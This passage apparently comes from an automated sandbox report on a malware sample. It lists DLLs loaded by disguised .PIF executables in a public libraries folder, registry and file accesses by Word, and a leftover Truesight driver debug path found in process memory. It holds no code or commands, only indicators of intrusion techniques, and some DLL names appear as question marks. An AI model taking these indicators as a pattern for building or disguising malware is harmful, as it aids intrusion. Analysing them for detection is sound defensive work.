                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: apphelp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: url.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieframe.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iertutil.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netapi32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wkscli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netutils.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winmm.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wininet.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: tquery.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: endpointdlp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: advapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppwmi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: slc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppcext.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winscard.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: devobj.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptsp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: rsaenh.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptbase.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mscoree.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: gpapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptsp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rsaenh.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptbase.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasapi32.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasman.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rtutils.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dhcpcsvc.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dnsapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: rasadhlp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: fwpuclnt.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: secur32.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: schannel.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: mskeyprotect.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntasn1.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncrypt.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ncryptsslp.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: dpapi.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: msv1_0.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: ntlmshared.dll
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: version.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: uxtheme.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: url.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieframe.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iertutil.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netapi32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: userenv.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winhttp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wkscli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: netutils.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: amsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: smartscreenps.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: kernel.appcore.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winmm.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wininet.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sspicli.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: windows.storage.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: wldp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: profapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ieproxy.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mswsock.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: iphlpapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: winnsi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: am.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ???e???????????.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ?.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: ??l.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: sppc.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: tquery.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: cryptdll.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: spp.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vssapi.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: vsstrace.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: mssip32.dll
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 